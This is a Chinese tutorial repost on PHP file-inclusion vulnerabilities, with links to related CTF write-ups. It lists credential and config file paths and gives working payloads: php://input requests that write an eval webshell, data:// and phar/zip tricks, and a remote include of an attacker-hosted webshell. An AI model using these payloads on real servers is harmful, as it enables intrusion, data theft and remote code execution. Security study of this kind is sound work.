FileInclude

最新推荐文章于 2025-07-14 14:04:30 发布
转载 最新推荐文章于 2025-07-14 14:04:30 发布 · 1.4k 阅读 · 7 ·
CC 4.0 BY-SA版权
原文链接:https://www.freebuf.com/articles/web/182280.html

漏洞原理

文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码

两种类型

  • 本地文件包含

  • 远程文件包含

    在默认情况下,allow_url_include是禁用的【需要开启】

危险函数

include、require、include_once、require_once

include、require区别

include在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行;而require函数出现错误的时候,会直接报错并退出程序的执行。

include_once,require_once区别

与前两个的不同之处在于这两个函数只包含一次

常见的敏感信息路径

Windows系统

c:\boot.ini // 查看系统版本

c:\windows\system32\inetsrv\MetaBase.xml // IIS配置文件

c:\windows\repair\sam // 存储Windows系统初次安装的密码

c:\ProgramFiles\mysql\my.ini // MySQL配置

c:\ProgramFiles\mysql\data\mysql\user.MYD // MySQL root密码

c:\windows\php.ini // php 配置信息

Linux/Unix系统

/etc/passwd // 账户信息

/etc/shadow // 账户密码文件

/usr/local/app/apache2/conf/httpd.conf // Apache2默认配置文件

/usr/local/app/apache2/conf/extra/httpd-vhost.conf // 虚拟网站配置

/usr/local/app/php5/lib/php.ini // PHP相关配置

/etc/httpd/conf/httpd.conf // Apache配置文件

/etc/my.conf // mysql 配置文件

本地文件包含

攻击者通过phpinfo()信息泄露或者猜测能获取到文件存放的位置

日志投毒/SSH投毒

#日志投毒
/var/loa/apache2/access.log
#SSH投毒
/var/log/auth.log

条件:文件必须有读的权限,否则无法投毒

session文件包含漏洞

分析

通过把恶意代码写入session文件中,之后访问该文件即可获得shell

文件位置

  1. phpinfo探针获取
  2. 猜解文件文件位置【linux默认/var/lib/php/session】

文件名称

session的文件名为sess_+sessionid,sessionid可以通过开发者模式获取

写入恶意代码

<?php
session_start();
$cmd=$_GET['cmd'];
$_SESSION["username"]=$cmd;
?>

利用

http://xxx/session.php?cmd=<?php phpinfo();?>

远程文件包含

条件:PHP的配置文件allow_url_fopen和allow_url_include设置为ON

绕过姿势

编码绕过

当服务端对…/和./进行过滤,可以通过编码进行绕过(url编码、URL二次编码、容器/服务器的编码方式等)。

%00截断

条件:magic_quotes_gpc = Off php版本<5.3.4

http://xxx/file.php?filename=../../../../../etc/passwd%00

路径长度截断

利用条件: php版本<5.2.8。
一直重复目录字符串(./),在linux下4096字节时会达到最大值,在window下是256字节。windows在文件名后加/. 或 .都是可以的

http://xxx/file.php?filename=../../../../../../../../../../../../../../etc/passwd

点号截断

条件:windows OS,点号需要长于256

http://xxx/file.php?filename=test.txt..................................

问号、井号、空格截断

针对服务器添加后缀,可以在后面添加?和#。

http://xxx/file.php?filename=http://VPSIP/webshell.php%23
# %23为#编码

Base64编码

有些时候,当你无法读取PHP文件内容时,你也可以通过php协议通过base64编码进行输出:

php://filter/read=convert.base64-encode/resource=/etc/passwd

PHP伪协议

phar协议

这个参数是就是php解压缩包的一个函数,不管后缀是什么,都会当做压缩包来解压。

用法

?file=phar://压缩包/内部文件 phar://xxx.png/shell.php 注意: PHP > =5.3.0 压缩包需要是zip协议压缩,rar不行,将木马文件压缩后,改为其他任意格式的文件都可以正常使用。

步骤
//1-写一个一句话木马文件shell.php,
<?php
    $filename  = $_GET['filename'];
    include($filename);
?>
//2-用zip协议压缩为shell.zip,然后将后缀改为png等其他格式。
//之所以改成png后缀,因为phar协议不管后缀是什么,都会当做压缩包来解压。而且也可以绕过一定的后缀限制
//3-调用(猜解文件路径,或者通过phpinfo()查看)
//相对路径:
http://target.com/index.php?file=phar://shell.png/shell.php
//绝对路径:
http://target.com/index.php?file=phar:///var/www/html/shell.png/shell.php

zip://伪协议

用法

?file=zip://[压缩文件绝对路径]#[压缩文件内的子文件名] zip://xxx.png#shell.php。

条件

PHP > =5.3.0,注意在windows下测试要5.3.0<PHP<5.4 才可以 #在浏览器中要编码为%23,否则浏览器默认不会传输特殊字符。

步骤
//1-写一个一句话木马文件shell.php,
<?php
    $filename  = $_GET['filename'];
    include($filename);
?>
//2-用zip协议压缩为shell.zip,然后将后缀改为png等其他格式。
//之所以改成png后缀,因为phar协议不管后缀是什么,都会当做压缩包来解压。而且也可以绕过一定的后缀限制
//3-调用(猜解文件路径,或者通过phpinfo()查看)
//绝对路径:
http://target.com/index.php?file=phar:///var/www/html/shell.png%23shell.php

file://伪协议

访问本地文件系统,读取到文件的内容

http://target.com/index.php?file=file://etc/passwd

PHP://伪协议

php://filter(本地磁盘文件进行读取)

条件:只是读取,需要开启 allow_url_fopen,不需要开启 allow_url_include;

http://target.com/index.php?file=php://filter/read=convert.base64-encode/resource=xxx.php
php://input
条件

enctype=“multipart/form-data” 的时候 php://input 是无效的。

读取POST数据

碰到目标代码中存在file_get_contents()就要想到用php://input绕过

//目标代码存在file_get_contents()
<?php
    echo file_get_contents("php://input");
?>
写入木马

条件:php配置文件中需同时开启 allow_url_fopen 和 allow_url_include(PHP < 5.3.0)

//目标代码
<?php
    $filename  = $_GET['filename'];
    include($filename);
?>
//写入木马<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>
http://target.com/index.php?file=php://input
//post 内容
<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>

//调用木马
http://target.com/index.php/shell.php
cmd=phpinfo()
命令执行

条件:php配置文件中需同时开启 allow_url_fopen 和 allow_url_include(PHP < 5.30)

//目标代码
<?php
    $filename  = $_GET['filename'];
    include($filename);
?>
http://target.com/index.php?file=php://input
//post 内容
<?PHP system('whoami');?>

data://伪协议

条件:
  1. php版本 <= php5.2
  2. allow_url_fopen = On
  3. allow_url_include = On

和php伪协议的input类似,碰到file_get_contents()来用

//目标代码
<?php
    $filename  = $_GET['filename'];
    include($filename);
?>
http://target.com/index.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw==
//此处PD9waHAgcGhwaW5mbygpOw==为<?php phpinfo();base64编码结果
//不需要<?php phpinfo();? >编码,只需对<?php phpinfo();编码即可

文件包含漏洞利用工具

LFISuite
LFI Scan

参考链接

文件包含
文件包含
文件包含

【网络安全 | CTF】攻防世界 fileinclude 解题详析(php伪协议)
等风来
07-31 6711
由于index.php在/var/www/html目录下,而flag.php与index.php同为php文件,故猜想flag.php也在该目录下。因此解题思路为:利用php伪协议,构造language参数,来读取该目录下的flag.php文件。,即此处存在文件包含。
fileinclude (攻防世界web)
qq_53099119的博客
10-01 1953
接下来构造payload,使用filter伪协议来读取flag.php的源码: payload: language=php://filter/convert.base64-encode/resource=/var/www/html/flag 注意,由于在源码分析中,对lan最后拼接了“.php”,因此在payload中flag后不用加。 执行后即可获得flag的base64编码。
攻防世界-file_include
m0_49025459的博客
12-18 8300
对于我这种编码能力差的小白,我直接就是一个一个手测,然后呢,发现?filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=check.php好使,但是没有flag。读题我们发现我们需要去读取./check.php中的数据,我们尝试用伪协议进行读取,接下来构造payload。文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。通过阅读php代码,我们明显的可以发现,这个一个文件包含的类型题。
fileinclude解题流程
qq_65240014的博客
02-04 697
convert.base64-encode/convert.base64-decode是转换过滤器属于read的参数,相当于base64_encode()和 base64_decode(),作用是base64 编码解码。可以看到包中不含有cookie,这就需要我们自己设置cookie值。所以,要想得到flag就需要找到flag.php文件,也就是满足第二个判定条件,而这里存在文件包含漏洞。这一串就是经过base64编码过的flag,复制下来到decoder模块进行解密就能得到flag了。
Web安全攻防世界01 fileinclude(宜兴网信办)
weixin_42789937的博客
11-26 7409
Web安全攻防世界01 fileinclude,文件包含类型题目,参考大佬们的WP有所补充,内容对小白友好~
fileinclude_file_include,2024年最新网络安全大厂面试题来袭
m0_61068496的博客
04-05 912
如果$lan不存在或为空,使用setcookie函数设置一个名为language的cookie,值为"english",并包含"english.php"文件。突然想要file\_get\_contents函数是打开文件读取的,所以我们这里需要利用php的data伪协议写入数据。发现可以读取,抓包后是没有Cookie字段的,记得插入Cookie的位置不要处于数据包最后,反正我会请求超时。使用file_get_contents函数获取名为index.php的文件的内容,并将其赋值给变量$x。
File Include
qq_39536716的博客
04-26 349
文件包含类型的题目 学习网址 文件包含 150 解题方式 使用php://filter协议读取index文件 payload:http://4.chinalover.sinaapp.com/web7/index.php?file=php://filter/read=convert.base64-encode/resource=./index.php 需要对file后面的内容做一些修改 本地包...
攻防世界(CTF)~web-fileinclude
海鸥先生的博客
04-21 793
本题主要涉及到php伪协议和代码审计,如果文章有错误希望及时和小白我联系进行更改! 加油,又是刷题的一天!
[PiKaChu靶场通关]文件包含file include
网络安全知识分享
10-13 3181
文件包含file include一、File Inclusion(文件包含漏洞)概述1.本地文件包含漏洞2.远程文件包含漏洞二、本地文件包含三、远程文件包含 一、File Inclusion(文件包含漏洞)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),require_once() 这些文件包含函数,这些函数在代码设计中
文件包含include
2403_87533599的博客
12-17 941
在 PHP 中,伪协议(Pseudo Protocols) 也被称为 流包装器,这些伪协议以 php:// 开头,后面跟着一些参数,用于指定 要执行的操作 或 需要访问的资源。PHP 伪协议的出现是为了提供一个 统一的、简洁的 接口来处理 不同的数据流。这里我们要使用php伪协议 来访问我们需要的flag.php并且将file2的数值改为"hello ctf"这里第二行我们可以看见告诉我们在flag.php里面 然后检查了两次file1和file2是否为空。猜一下flag在flag.php文件中。
Fileinclude
淡巴枯的博客
09-20 563
可以看出lan的值是从cookie中传来的。然后lan进了条件判断,由于非lan,所以包含的是english.php页面。但我们要去flag.php页面,此时继续向下看,可以看到@include($lan.“.php”);也就是说lan存在则会将lan的值拼接.php然后进行包含。因此,我们要对language赋值,构造payload。
File Inclusion(文件包含)
qq_63963927的博客
10-19 797
程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某个函数的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含。漏洞原因:程序开发人员都希望代码更加灵活,所以通常会把被包含的文件设置为变量来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用任意文件,造成文件包含漏洞。
fileinclude_file_include
2501_90253044的博客
01-17 1152
但是因为不知道绝对路径,不能直接利用file读取查看源码后,发现里面嵌入了一段php代码。
file_include(江苏工匠杯)
szhangliwenya的博客
03-19 442
文件包含:开发人员一般会把重复使用的函数写到单个文件中,当需要使用这个函数时直接调用此文件,而无需再次编写,这种文件调用的过程一般被称为文件包含。那正常来说包含的文件是固定的、写死的就不会存在文件包含漏洞,但是这样的话又不够便捷,所以开发人员为了使代码调用更加灵活,就会将被包含的文件设置为变量,用来进行动态调用。但正是由于这种灵活性,允许用户从客户端提交一个变量值来作为文件包含的变量值,当这个值是段恶意代码时,并且服务端又没有对用户的输入进行一个很好的过滤,就会造成文件包含漏洞。Base64编码的内容。
攻防世界-file_include(文件包含漏洞)
最新发布
2301_81434523的博客
07-14 845
因为博主刚开始学习ctf,所以这确确实实是从小白视角开始了(手动狗头),在此之前,博主看了好多文章努力揣摩其中的意思,仍旧是一知半解,不过在坚持不懈的努力下博主终于弄懂了大致意思,为了帮助和我一样理解能力较差的同学,遂想要书写一篇便于理解的博客,让新手小白更容易入手和入门,之后还会继续更新,有什么不妥的地方还请大家多多指正[抱拳][抱拳][抱拳]博主看了好多文章,大部分都是作者直接给出了这个漏洞的定义,但是我觉得作为一个新手,第一次看到这种漏洞解释根本就是看不懂,所以博主在这里给出自己的解释。
攻防世界 -- fileinclude
weixin_48031371的博客
09-14 3749
攻防世界 -- fileinclude
【攻防世界】file_include
m0_74979597的博客
09-13 3075
这个参数filename,,用户可以通过这个参数找到漏洞;1.当我使用filename=
file_include(攻防世界)
热门推荐
m0_56107268的博客
11-14 1万+
php转化器的学习
fileinclude
Sweet_vinegar520的博客
03-26 528
习惯性查看源代码,得到了题目真正的内容,关键在于lan变量读取我们传入的Cookie值中的language变量内容,然后进行包含,我们只需要让lan的值为flag即可。场景首页没有什么提示,只有个flag在flag.php中,而且需要更改language,还有个index.php的路径,先记住它。根据文件包含和php伪代码的知识,我们可以很轻易编写一段payload。最终得到一串base64加密过后的源代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值